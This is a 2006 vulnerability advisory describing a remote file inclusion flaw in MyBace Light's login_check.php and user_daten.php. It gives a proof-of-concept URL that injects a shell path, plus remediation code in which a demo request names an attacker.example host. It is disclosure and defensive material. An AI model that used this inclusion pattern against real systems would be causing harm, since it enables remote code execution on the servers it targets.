SECURITYVULNS:DOC:14127
Sep 02, 2006 - 12:00 a.m.

MyBace Light (hauptverzeichniss) Remote File Inclusion

2006-09-02 00:00:00
vulners.com

+-------------------------------------------------------------------+

  • Affected Files:
      • includes/login_check.php
        var: $hauptverzeichniss
      • admin/login/content/user_daten.php
        var: $template_back

+-------------------------------------------------------------------+

  • $hauptverzeichniss and $template_back are not properly sanitized before being used to build an include path

+-------------------------------------------------------------------+

  • Solution:
  • Deny direct access to these files using a .htaccess file,
  • or modify the code (shown for includes/login_check.php; the same guard
    applies to admin/login/content/user_daten.php with $template_back):

    <?php
    // Refuse the request if the variable was supplied from outside;
    // only then run the original code of the file.
    if (!isset($_REQUEST['hauptverzeichniss'])
        && !isset($_GET['hauptverzeichniss'])
        && !isset($_POST['hauptverzeichniss'])) {
        // code of the original *.php
    } else {
        echo "You cannot access this file directly.";
        die();
    }
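
An added example, not MyBace Light's own code, showing the include pattern this advisory describes next to a hardened form. The file names and the $hauptverzeichniss / $template_back variables come from the advisory; the function names, the template allowlist and the MYBACE_ENTRY constant are assumptions made for illustration. The isset() guard above only rejects requests that name the parameter; the hardened form never derives a path from request data at all.

```php
<?php
// Added example (not MyBace Light's code). The vulnerable helper reproduces
// the pattern the advisory reports: with register_globals enabled, a request
// parameter becomes $hauptverzeichniss before the include runs, so the
// included path is attacker-controlled. Function and constant names here
// are assumptions for illustration.

// --- Vulnerable pattern -------------------------------------------------
function vulnerable_include_path(array $request): string
{
    // Equivalent to what register_globals (or extract($_REQUEST)) does:
    $hauptverzeichniss = $request['hauptverzeichniss'] ?? '';
    // A remote URL here is fetched and executed when allow_url_include is on;
    // a local path turns the same line into a local file inclusion.
    return $hauptverzeichniss . '/includes/config.php';
}

// --- Hardened form ------------------------------------------------------
// 1. The base directory is a property of the installation; compute it from
//    __DIR__ instead of accepting it from the request.
function hardened_base_dir(): string
{
    return dirname(__DIR__);
}

// 2. Where a parameter must choose a file (the $template_back case), map it
//    through a fixed allowlist; the request value never touches the path.
const TEMPLATE_DIR = __DIR__ . '/templates';
const ALLOWED_TEMPLATES = [
    'default' => 'default.php',
    'admin'   => 'admin.php',
];

function hardened_template_path(array $request): ?string
{
    $key = $request['template_back'] ?? 'default';
    // is_string() first: template_back[]=x would arrive as an array.
    if (!is_string($key) || !array_key_exists($key, ALLOWED_TEMPLATES)) {
        return null;   // caller answers 400; nothing from the request is used
    }
    return TEMPLATE_DIR . '/' . ALLOWED_TEMPLATES[$key];
}

// 3. Direct-access guard: the entry script (e.g. index.php) defines
//    MYBACE_ENTRY before including library files; a direct request never
//    has it. Unlike an isset() test on the parameter, this cannot be
//    satisfied by simply leaving the parameter out.
function deny_direct_access(): void
{
    if (!defined('MYBACE_ENTRY')) {
        http_response_code(403);
        exit('You cannot access this file directly.');
    }
}

// Constructed request for demonstration (no include() is executed here).
$demo = ['hauptverzeichniss' => 'http://attacker.example', 'template_back' => '../other.php'];
echo "vulnerable: ", vulnerable_include_path($demo), PHP_EOL;   // attacker host in the path
echo "base dir:   ", hardened_base_dir(), PHP_EOL;
var_dump(hardened_template_path($demo));                        // NULL: rejected by allowlist
var_dump(hardened_template_path(['template_back' => 'admin'])); // .../templates/admin.php

define('MYBACE_ENTRY', true);
deny_direct_access();   // passes because the entry script defined the constant
```

Run it with the PHP CLI (php example.php); the vulnerable helper returns a path beginning with the attacker-supplied value, while the allowlist returns NULL for anything that is not one of its keys, so no user-controlled string ever reaches include().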

+-------------------------------------------------------------------+

  • PoC:
  • http://[target]/includes/login_check.php?hauptverzeichniss=[shell]

+-------------------------------------------------------------------+

  • Notice: I tried to contact the vendor 3 weeks ago, but no answer yet…
  • Greets: /str0ke

+------------------------[ E O F ]----------------------------------+